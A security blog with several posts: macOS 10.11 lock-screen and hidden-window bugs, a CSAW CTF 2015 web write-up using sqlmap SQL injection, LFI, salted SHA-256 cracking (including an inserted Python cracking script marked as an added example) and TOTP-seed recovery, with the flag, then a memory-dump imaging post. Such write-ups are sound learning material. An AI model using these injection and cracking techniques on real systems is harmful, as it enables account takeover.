Many respected researchers have found and published something about this class of bugs and this blog is no different: this post describes a <strike>completely useless</strike> <a href="https://www.youtube.com/watch?v=h05YfP_8UsU">super serious</a> vulnerability affecting Mac OS X 10.11 and earlier.<br />
<br />
<b>Mac OS X 10.11 Partial Lock Screen Bypass</b><br />
<br />
Mac OS X 10.11 (and probably older versions) is vulnerable to a partial lock screen bypass. This is not a *complete* lock screen bypass, as you won't be able to freely interact with the Desktop (as far as I know). Here are the steps to reproduce this bug:<br />
<br />
1 - Hit the <b>Exposé Key (F3)</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjko-WO4OlQ9gV6By9gN_RsL_q3pEoVrOMsOTRf2-jzui1QFd1nEel9uMZPed8yYar8ok1DDWP9pME-kr_OIMXWT0mIJ5iWC8_dt7hAmQq7CQwbo2uIpxJtKbn2wx4HgVgjHd42BSY9HPL3/s1600/Screen+Shot+2015-10-07+at+1.43.38+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjko-WO4OlQ9gV6By9gN_RsL_q3pEoVrOMsOTRf2-jzui1QFd1nEel9uMZPed8yYar8ok1DDWP9pME-kr_OIMXWT0mIJ5iWC8_dt7hAmQq7CQwbo2uIpxJtKbn2wx4HgVgjHd42BSY9HPL3/s400/Screen+Shot+2015-10-07+at+1.43.38+AM.png" width="400" /></a></div>
<br />
<br />
2 - Click on any window and keep holding it<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdZYKgmDyklZMm_mYapq0IN3q6W22Cu0Hbp08k4BURgJo7RNmI8corKFLk5_UhMZxkskx9xK8W0QVu5uyunmjjh-Qor8jt1Fek4p8nWVakxyJO8ImJBC4J6WkpqC6kk9mHBTaFWr_5eHw_/s1600/Screen+Shot+2015-10-07+at+1.43.56+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgdZYKgmDyklZMm_mYapq0IN3q6W22Cu0Hbp08k4BURgJo7RNmI8corKFLk5_UhMZxkskx9xK8W0QVu5uyunmjjh-Qor8jt1Fek4p8nWVakxyJO8ImJBC4J6WkpqC6kk9mHBTaFWr_5eHw_/s400/Screen+Shot+2015-10-07+at+1.43.56+AM.png" width="400" /></a></div>
<br />
<br />
3 - Keep holding the left mouse button and lock the screen using <b>Command + Option + Eject </b>(hold all these keys together for some time)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFFh6pvWnydcxuzquvcGggmD3t_g8AaXquEeRcyKH3Jobik4LBH0WpkU-cgLsJjDGpenqBI6Nwo0lYXcnHOrDKAdF49E2RQEc-nePNv_9bSz6F9X52vKrANwyRcJUoj7byQB1Dt4z6CeV-/s1600/Screen+Shot+2015-10-07+at+1.48.54+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="223" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFFh6pvWnydcxuzquvcGggmD3t_g8AaXquEeRcyKH3Jobik4LBH0WpkU-cgLsJjDGpenqBI6Nwo0lYXcnHOrDKAdF49E2RQEc-nePNv_9bSz6F9X52vKrANwyRcJUoj7byQB1Dt4z6CeV-/s400/Screen+Shot+2015-10-07+at+1.48.54+AM.png" width="400" /></a></div>
<br />
<br />
That's it, now the lock screen has an "extra layer" with the miniaturised desktop windows. If you move the mouse cursor over the correct application position and hit the <b>Space Key</b>, a bigger window will be displayed.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4Vc6VWP_y-fA90B4nVrG2LVQdObgOb1AQ13_U6fb5UmS0QGTMBVyUZJLxWix6yiXFyspPkvkhyphenhyphenpNKsTDdTgnYpnTg6pC6exaahPO49vK9AQi1eRMMzGzWeIEunAvynRerTnDXDaZcfwoe/s1600/Screen+Shot+2015-10-07+at+2.08.54+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4Vc6VWP_y-fA90B4nVrG2LVQdObgOb1AQ13_U6fb5UmS0QGTMBVyUZJLxWix6yiXFyspPkvkhyphenhyphenpNKsTDdTgnYpnTg6pC6exaahPO49vK9AQi1eRMMzGzWeIEunAvynRerTnDXDaZcfwoe/s320/Screen+Shot+2015-10-07+at+2.08.54+AM.png" width="320" /></a></div>
<br />
<br />
You can watch Youtube videos and interact with media players (Quicktime, Spotify etc) using the media control keys. You can't interact directly with the app: if you left-click on the windows or hit Enter, the lock screen takes over that invisible layer.<br />
<br />
Proof-of-concept - Mac OS X 10.11:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/lDkJ0XtIrxk/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/lDkJ0XtIrxk?feature=player_embedded" width="320"></iframe></div>
<br />
If Youtube is blocking the video in your country, watch it here:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/yQ8SYyP4-Uw/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/yQ8SYyP4-Uw?feature=player_embedded" width="320"></iframe></div>
<br />
<br />
If you are a serious tech journalist reporting about this <strike>bug</strike> feature, don't forget to say that this is especially useful to play Youtube and Spotify playlists during parties at a friend's house. You don't want to leave your Mac logged in and unattended, so you simply preload the playlist and lock the screen using this cool technique.<br />
<br />
<br />
<b>Bonus: Mac OS X 10.11 Hidden Window Bug</b><br />
<br />
This is yet another <strike>useless</strike> <a href="https://www.youtube.com/watch?v=nGf3PdZviXk">totally serious</a> bug affecting the new Mac OS X El Capitan. You can hide an application window from the user by moving it to another display and alternating the screen mirroring options. Here are the steps to reproduce this bug:<br />
<br />
1 - Connect an external display and set it to "Use As Separate Display"<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhP-DVQImHh4ce8BCenmmUvYowW5GgQ9Ag2u1QryJoYLrS5HGV6YMHlJAjyzwAz7PBZvGd3WimIi2rkX6zwPQOKLA7aOB-SkVzH2CTZTeHJIfH228_BHwSCnJjEyfsXzUfNo5tEoPtfW9R/s1600/Screen+Shot+2015-10-07+at+2.10.37+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="189" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhP-DVQImHh4ce8BCenmmUvYowW5GgQ9Ag2u1QryJoYLrS5HGV6YMHlJAjyzwAz7PBZvGd3WimIi2rkX6zwPQOKLA7aOB-SkVzH2CTZTeHJIfH228_BHwSCnJjEyfsXzUfNo5tEoPtfW9R/s320/Screen+Shot+2015-10-07+at+2.10.37+AM.png" width="320" /></a></div>
<br />
2 - Move the window you want to hide to the secondary display<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCZbVeRNEDExMwpv7G_s7M8JmH982TeNxsw0eG7JlYy5lbo-cGR-AJZb2e47kpw9PBcdOBmrwtgNW5nHNKdTJxQEjVRefCg5G3EmHdmY7nPS4Dyhd_bQJXG30OLWIqKgKVdOsHnnuxBaWV/s1600/Screen+Shot+2015-10-07+at+2.25.33+AM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiCZbVeRNEDExMwpv7G_s7M8JmH982TeNxsw0eG7JlYy5lbo-cGR-AJZb2e47kpw9PBcdOBmrwtgNW5nHNKdTJxQEjVRefCg5G3EmHdmY7nPS4Dyhd_bQJXG30OLWIqKgKVdOsHnnuxBaWV/s400/Screen+Shot+2015-10-07+at+2.25.33+AM.png" width="400" /></a></div>
<br />
3 - Hit the <b>Exposé Key (F3)</b>, move the mouse cursor over the window you want to hide and hit the <b>Space Key</b>.<br />
<br />
4 - Alternate the screen mirroring options by inputting <b>Command + F1</b><br />
<br />
5 - The window is gone (OMGBBQ!!!)<br />
<br />
Proof-of-concept - Mac OS X 10.11:<br />
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/g5RmxeP_2dk/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/g5RmxeP_2dk?feature=player_embedded" width="320"></iframe></div>
<br /></div>
<div>
<br /></div>
<div>
I personally use this to hide all the Mac applications from coworkers who leave their computers unlocked and unattended.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKHvPhAzfFwM3rXpbN4PDmKqVwRBBtgrJ7Ge2bk0oCU-8GTZ0fwJ1cKfYXtg5FdEmU7YhR4L3EmctgjXhyz_SDGDMWILELHo0P3inxzP2pPIsT9cI962QvSQ3hS5YoDtsZdZwfMAqNnzng/s1600/evilest.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKHvPhAzfFwM3rXpbN4PDmKqVwRBBtgrJ7Ge2bk0oCU-8GTZ0fwJ1cKfYXtg5FdEmU7YhR4L3EmctgjXhyz_SDGDMWILELHo0P3inxzP2pPIsT9cI962QvSQ3hS5YoDtsZdZwfMAqNnzng/s320/evilest.gif" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Bernardo Rodrigues<br />
<br />
<b>CSAW CTF 2015 Write Up: Weebdate (web500)</b> (2015-09-20)<br />
<br />
The annual CSAW CTF Qualification Round took place on September 18-20 and it was yet another really cool CTF. I played with my friends from TheGoonies and we ranked #128 overall (<a href="https://www.youtube.com/watch?v=hM5cj8OZZhk">The Goonies 'R' Good Enough</a>).<br />
<br />
<b>Task - Weebdate (web500)</b><br />
<br />
<div class="code">
Since the Ashley Madison hack, a lot of high profile socialites have scrambled to find the hottest new dating sites. Unfortunately for us, that means they're taking more safety measures and only using secure websites. We have some suspicions that Donald Trump is using a new dating site called "weebdate" and also selling cocaine to fund his presidential campaign. We need you to get both his password and his 2 factor TOTP key so we can break into his profile and investigate.<br />
<br />
Flag is md5($totpkey.$password)<br />
<br />
http://54.210.118.179/</div>
<br />
This is a basic Flask application running a dating site. The website has most of the features we are used to in web applications: creating users, editing profiles, sending messages, searching users and <a href="https://en.wikipedia.org/wiki/Ashley_Madison_data_breach">exposing the whole customer data</a> through SQL Injection and LFI.<br />
<br />
<b>SQLi</b><br />
<br />
The CSP reporting URI was vulnerable to SQL injection. SQLmap had no problems finding and exploiting it.<br />
<br />
<div class="code">
python sqlmap.py -u 'http://54.210.118.179:80/csp/view/1' --cookie='session=donaldtrump010_1442717300_f65cb746b519c2b49f8e938a896e08e96f5fc533' --dbms=mysql --batch
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb1xrxGSKaVdZ3CdnD03FTyYcvspMR0U5z9OC42qWiD8YkJIKsUqrVtbXvmoQd2zkwHfwIRQtajrjU-lZmmX6kHSEynMqZZJ2ywtC-lAByYl6rlWw-7lkTLGCCNMVQHFtiK8wYlNvmCF0k/s1600/sqli.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhb1xrxGSKaVdZ3CdnD03FTyYcvspMR0U5z9OC42qWiD8YkJIKsUqrVtbXvmoQd2zkwHfwIRQtajrjU-lZmmX6kHSEynMqZZJ2ywtC-lAByYl6rlWw-7lkTLGCCNMVQHFtiK8wYlNvmCF0k/s640/sqli.png" width="532" /></a></div>
The 'weeb' database had three tables: messages, reports and users. The 'users' table had eight columns: user_id, user_name, user_password, user_ip, user_image, user_credits, user_register_time and user_profile.<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTciVYvVidhk-0RVcJibyTxLOMHMm9XN4kPjgXdElGbJasMEw6wI3ulPOoJcxEVT2SpPlP7DaQj-sQkFcOXe7NtJxTaNbDa5HxbEQNyYVRB4iW3sh-Y7Pnw8KnYgwTkc4JFf5uz1psKxxK/s1600/Capturar.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="281" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTciVYvVidhk-0RVcJibyTxLOMHMm9XN4kPjgXdElGbJasMEw6wI3ulPOoJcxEVT2SpPlP7DaQj-sQkFcOXe7NtJxTaNbDa5HxbEQNyYVRB4iW3sh-Y7Pnw8KnYgwTkc4JFf5uz1psKxxK/s640/Capturar.PNG" width="640" /></a></div>
<br />
<br />
Passwords had a SHA256 pattern so I quickly started cracking them using John The Ripper:<br />
<br />
<div class="code">
john --format=raw-sha256 hash.txt --wordlist=rockyou.txt</div>
<br />
Most cracked passwords had patterns like 'testtest', 'lablab' and 'guest1guest1'. After some time I realised that the username was used as a <a href="https://en.wikipedia.org/wiki/Salt_(cryptography)">Salt</a>. I generated a small wordlist concatenating donaldtrump's user and password and I finally managed to crack it:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0vQH11eWD5wE6kAp7ZlUtVuBocrFV_JyJ6BQ07ydSZw2U0aPfGJyXubbeRoImhxozIy-EjvwlikN-DTg_La54WqhCJlX_PrnDi-s52lzDQcpAQnHVogby7eyeydIc_sxaFAKSZ3hOX6U-/s1600/crack.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="502" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0vQH11eWD5wE6kAp7ZlUtVuBocrFV_JyJ6BQ07ydSZw2U0aPfGJyXubbeRoImhxozIy-EjvwlikN-DTg_La54WqhCJlX_PrnDi-s52lzDQcpAQnHVogby7eyeydIc_sxaFAKSZ3hOX6U-/s640/crack.PNG" width="640" /></a></div>
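The trick above, as an added example that is not part of the original write-up: john's raw-sha256 format hashes each wordlist entry as-is, so a digest of username||password only falls if the wordlist already contains that concatenation. The script builds those candidates per user, tries both concatenation orders (the challenge's order is not stated, so both are assumed), and either checks them directly or emits a per-user wordlist for john. The user records and WORDLIST are constructed for the example, not the challenge's real data.

```python
"""Added example: cracking SHA-256 hashes that use the username as the salt.
The dump rows and wordlist below are CONSTRUCTED, not the challenge's data."""
import hashlib


def sha256_hex(s: str) -> str:
    return hashlib.sha256(s.encode()).hexdigest()


WORDLIST = ["123456", "password", "test", "lab", "zebra", "guest1"]

# Constructed dump rows in the shape of the SQLi output: (user_name, user_password)
DUMP = [
    ("test", sha256_hex("test" + "test")),             # salt prepended -> "testtest"
    ("lab", sha256_hex("lab" + "lab")),                # salt prepended -> "lablab"
    ("guest1", sha256_hex("password" + "guest1")),     # salt appended, for contrast
    ("donaldtrump", sha256_hex("donaldtrump" + "zebra")),
    ("nobody", sha256_hex("nobody" + "not-in-any-wordlist")),
]

# Both concatenation orders are tried because the real order is an assumption.
LAYOUTS = {
    "user+pass": lambda user, word: user + word,
    "pass+user": lambda user, word: word + user,
}


def john_candidates(user: str, wordlist) -> list:
    """Lines for a per-user wordlist that plain `john --format=raw-sha256` can consume."""
    return [join(user, w) for w in wordlist for join in LAYOUTS.values()]


def crack(dump, wordlist) -> dict:
    """Return {user: (password, layout)} for every hash hit by a candidate."""
    found = {}
    for user, digest in dump:
        for word in wordlist:
            for layout, join in LAYOUTS.items():
                if hashlib.sha256(join(user, word).encode()).hexdigest() == digest:
                    found[user] = (word, layout)
                    break
            if user in found:
                break
    return found


if __name__ == "__main__":
    for user, (password, layout) in crack(DUMP, WORDLIST).items():
        print(f"{user}: {password!r} (hash layout {layout})")
```

The layout label tells you which order the application used; once one account confirms it, drop the other order and hand `john_candidates()` output to john for the rest of the dump.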
<br />
<br />
The login form leaks which factor failed: it displays "Invalid verification code" for a wrong TOTP code but "Invalid credentials" for a wrong password. That confirmed the password 'zebra' was correct, but I still needed to find out how the TOTP seed was generated in order to recover his seed.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_aVKewbLLZCzPrPx5oJOYvHHJZ3hFwRmX_HwUX5-PFowngPXX7eITcicHdfg9PL0HWfRbuO2ZjWw33Qfj7ex8qgSzRrnaEUWc83SCFAOh5pr5Gsr-C5o3o6vN8C_h_3FlfFVJW1LlKQ_V/s1600/Screen+Shot+2015-09-20+at+6.55.41+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="515" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_aVKewbLLZCzPrPx5oJOYvHHJZ3hFwRmX_HwUX5-PFowngPXX7eITcicHdfg9PL0HWfRbuO2ZjWw33Qfj7ex8qgSzRrnaEUWc83SCFAOh5pr5Gsr-C5o3o6vN8C_h_3FlfFVJW1LlKQ_V/s640/Screen+Shot+2015-09-20+at+6.55.41+PM.png" width="640" /></a></div>
<b>LFI</b><br />
<br />
The 'image_url' parameter of '/profile/edit' was vulnerable to LFI, returning the full content of local files:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPKFVD6IZxNyE70dbXxU8X7MBaBkt00iXyvr0R-JmIe5iIpejhFinRCKYWn4SPVyss3lvfWUVFm3y5ZJHRgPyQSrXgGaMgKfLH6pUuDOFhHwcqN6hsc15wA1FPnDBA0iSn5s_xiM-_wMKW/s1600/Screen+Shot+2015-09-20+at+7.01.16+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="280" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPKFVD6IZxNyE70dbXxU8X7MBaBkt00iXyvr0R-JmIe5iIpejhFinRCKYWn4SPVyss3lvfWUVFm3y5ZJHRgPyQSrXgGaMgKfLH6pUuDOFhHwcqN6hsc15wA1FPnDBA0iSn5s_xiM-_wMKW/s640/Screen+Shot+2015-09-20+at+7.01.16+PM.png" width="640" /></a></div>
<br />
<br />
A curious note here is that it was the first time I found a bug using <a href="https://portswigger.net/burp/help/collaborator.html">Burp Collaborator</a>: the scanner spotted the server reaching out (HTTP and DNS) to a Collaborator URL injected into the parameter, and after some digging I quickly found the LFI =)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyHBCnOWp5U7TbtMCo447179QugKLyA8hnWpqml1UrttmPigtf62D46S4LYaSQiWNXYHUcKmG19m8olFIxMiHXLJ1syRaIAipdgXTLwWKwUKlF_2-6cM5T5pY6yC1QE2PM8MiyWK7o0s0E/s1600/collab.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="468" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiyHBCnOWp5U7TbtMCo447179QugKLyA8hnWpqml1UrttmPigtf62D46S4LYaSQiWNXYHUcKmG19m8olFIxMiHXLJ1syRaIAipdgXTLwWKwUKlF_2-6cM5T5pY6yC1QE2PM8MiyWK7o0s0E/s640/collab.png" width="640" /></a></div>
After <strike>some</strike> a lot of time bruteforcing directories and files, we managed to find the server root (and with it the application source):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbtN_KxvHplcHYNhaR4eE1j6mzndMmxtCZ4AgtqafHUuvoIKCkQ6hchpKotudMQlRDRPwmGdIV8VncSrBwnOwl-o0ftGnXOB5_OaGVyANCbTTK1HFCSbF1g7IndO9eZVJ9QJuGg78fcL6k/s1600/brute.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="488" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbtN_KxvHplcHYNhaR4eE1j6mzndMmxtCZ4AgtqafHUuvoIKCkQ6hchpKotudMQlRDRPwmGdIV8VncSrBwnOwl-o0ftGnXOB5_OaGVyANCbTTK1HFCSbF1g7IndO9eZVJ9QJuGg78fcL6k/s640/brute.png" width="640" /></a></div>
We are particularly interested in the generate_seed() function:<br />
<br />
- <u>server.py</u><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4gweQoRFFEzPCIuwxJONpJSJJW_uHVoBiVv640hOfblb_QwQQlG_Anmc9-2dAWARm-QUIS3J5BqpGg46eq_Ibv1-FbvP8MEfLZgOYoIrC0t1DX1xJpV_qlKaMnGqWh40WMmEFJfNe9fuh/s1600/Screen+Shot+2015-09-20+at+7.10.00+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="496" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj4gweQoRFFEzPCIuwxJONpJSJJW_uHVoBiVv640hOfblb_QwQQlG_Anmc9-2dAWARm-QUIS3J5BqpGg46eq_Ibv1-FbvP8MEfLZgOYoIrC0t1DX1xJpV_qlKaMnGqWh40WMmEFJfNe9fuh/s640/Screen+Shot+2015-09-20+at+7.10.00+PM.png" width="640" /></a></div>
<br />
- <u>utils.py</u><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiofoojdH3E8d1nPkob4i5-qQyemzK6paIEur2tjGmyRQ3VtzDPUErh-MZzJGGLpHwCUL1ZWZ2jLJjCJTtTthkuvN3_SFDWvkTDWVcetfqsp8kJe3UDOQNJwfFuJBB3dH8SHURQwG3GghF8/s1600/Screen+Shot+2015-09-20+at+7.09.16+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiofoojdH3E8d1nPkob4i5-qQyemzK6paIEur2tjGmyRQ3VtzDPUErh-MZzJGGLpHwCUL1ZWZ2jLJjCJTtTthkuvN3_SFDWvkTDWVcetfqsp8kJe3UDOQNJwfFuJBB3dH8SHURQwG3GghF8/s640/Screen+Shot+2015-09-20+at+7.09.16+PM.png" width="640" /></a></div>
<br />
The TOTP secret is not stored server-side: it is derived at runtime from the username and the registration IP address, both of which we already had from the SQLi dump. A second factor that is a pure function of data sitting in the database is no second factor at all. Feeding those two values to the get_otp_key() function yields his TOTP key:<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnReEC74mdUQ62mLfGO_xvMmyYKRFYUZCOOddn05u95jLXrSZ0TgGmLdFba2OiZi5mkQP0KO3M-EDDwG510kvSmxPH_8PQFwT5el_1y8dIpLW6EMZaFMgV3QCyGjwhSdQzVOZmYULHdFFE/s1600/Screen+Shot+2015-09-20+at+7.17.49+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="528" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnReEC74mdUQ62mLfGO_xvMmyYKRFYUZCOOddn05u95jLXrSZ0TgGmLdFba2OiZi5mkQP0KO3M-EDDwG510kvSmxPH_8PQFwT5el_1y8dIpLW6EMZaFMgV3QCyGjwhSdQzVOZmYULHdFFE/s640/Screen+Shot+2015-09-20+at+7.17.49+PM.png" width="640" /></a></div>
The flag is the md5($totpkey.$password): <b style="text-align: center;">a8815ecd3c2b6d8e2e884e5eb6916900</b><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsfiT7Y5QnsOgQESD_imPsEBJIZIzC6rL1OvQrtAKhnEshiqA0l-wZ8dYvS8POC1fw5OjVL3gsqhqELnLUsZ8xFv0S3LHzDk4an3UdruQm0iUqbFXqyzbU1OuNpGgF4LqO3eUtObvfGswl/s1600/Screen+Shot+2015-09-20+at+7.24.03+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhsfiT7Y5QnsOgQESD_imPsEBJIZIzC6rL1OvQrtAKhnEshiqA0l-wZ8dYvS8POC1fw5OjVL3gsqhqELnLUsZ8xFv0S3LHzDk4an3UdruQm0iUqbFXqyzbU1OuNpGgF4LqO3eUtObvfGswl/s640/Screen+Shot+2015-09-20+at+7.24.03+PM.png" width="640" /></a></div>
Bernardo Rodrigues (http://www.blogger.com/profile/09470949514402700579)<br />
<br />
<b>Extracting RAW pictures from memory dumps</b> (published 2015-02-26, updated 2015-02-27)<br />
<b>Introduction</b><br />
<br />
Earlier today, while reading my Twitter timeline, I saw some infosec folks discussing scripts/tools to identify RAW pictures in memory dumps. I decided to write this blog post and share a small hack that I use to visualize data (including memory dumps).<br />
<span style="text-align: center;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://twitter.com/angealbertini/status/570495262474416130"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhbl05-n0_xOnPK8a2CzumEn5b4zVHlbg9h4B4NS3cSa4PsY9LWwk9CV4jTIiKSPJTroLPQbiqj-rz3Td4cR-ycSrPV4Iq5UJ0HC5Atr8HeomSLDVXFM0_FyiZe0rLKu40wP39rErmmj6L8/s1600/ange.PNG" height="217" width="400" /></a></div>
<span style="text-align: center;"><br /></span>
<span style="text-align: center;"><br /></span>
<span style="text-align: center;">A few months ago, I wrote a post detailing how to </span><a href="http://w00tsec.blogspot.com/2014/08/scan-internet-screenshot-all-things.html" style="text-align: center;">Scan the Internet & Screenshot All the Things</a><span style="text-align: center;">, now it's time to Dump the Memory & Screenshot All the Things.</span><br />
<b style="text-align: center;"><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivDgwAnem_1gyADGDI3kQ39ONt8nbWwcTRP6kdEeOEbNOLFVrppnGBThfUUH-Cy-glumknW8pqCf89KDSjZzIwJ6OpOCOLRM12dAeXdxmvgNQ8w9FHfYr4AWO7BO7D4cX2DN-u8VdtaMPt/s1600/memfor.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivDgwAnem_1gyADGDI3kQ39ONt8nbWwcTRP6kdEeOEbNOLFVrppnGBThfUUH-Cy-glumknW8pqCf89KDSjZzIwJ6OpOCOLRM12dAeXdxmvgNQ8w9FHfYr4AWO7BO7D4cX2DN-u8VdtaMPt/s1600/memfor.jpg" height="239" width="320" /></a></div>
<b style="text-align: center;"><br /></b>
<b style="text-align: center;"><br /></b>
<b style="text-align: center;">Memory Dumps</b><br />
<br />
The first thing you will want to do is to narrow the analysis to the process containing interesting images/pictures. I'm going to use three different memory dumps here:<br />
<br />
<b>Remote Desktop Client - Windows 7 x64 (mstsc.exe)</b><br />
<br />
Let's use the Windows built-in RDP client to connect to an external server and dump the process memory using <a href="https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx">procdump</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG1DsLAu3lhIMxIssgjj30YboNiMyyKLqJtyc11RwOedbQnRJKEcnfenxkIYJlpmdxiRHFzzeWoTkcdMT3zkWnfnyUCaJYLBsjtrQSjruTKx8FMdkZmlZGWeRRErOvvEHBtDBUNhu98OQ4/s1600/rdp1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiG1DsLAu3lhIMxIssgjj30YboNiMyyKLqJtyc11RwOedbQnRJKEcnfenxkIYJlpmdxiRHFzzeWoTkcdMT3zkWnfnyUCaJYLBsjtrQSjruTKx8FMdkZmlZGWeRRErOvvEHBtDBUNhu98OQ4/s1600/rdp1.PNG" height="240" width="320" /></a></div>
<br />
<div class="code">
procdump.exe -ma mstsc.exe mstsc.dmp</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi_0MY48muzpS9zGzEwBloxSb6UrA3jW9jfTT8vi-PaCpyfye_w0Df_AfOE1Y86xMlGXRw2hMPtMZRMJ7rbmyxWqgt8DEQkHe6D_io7EWNb_-WCVmH-eMb1KMzaeRuPrg67gSs9E_x2eC-/s1600/rdp2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhi_0MY48muzpS9zGzEwBloxSb6UrA3jW9jfTT8vi-PaCpyfye_w0Df_AfOE1Y86xMlGXRw2hMPtMZRMJ7rbmyxWqgt8DEQkHe6D_io7EWNb_-WCVmH-eMb1KMzaeRuPrg67gSs9E_x2eC-/s1600/rdp2.PNG" height="201" width="400" /></a></div>
<br />
<br />
<b>Microsoft Paint - Windows 7 x64 (mspaint.exe)</b><br />
<br />
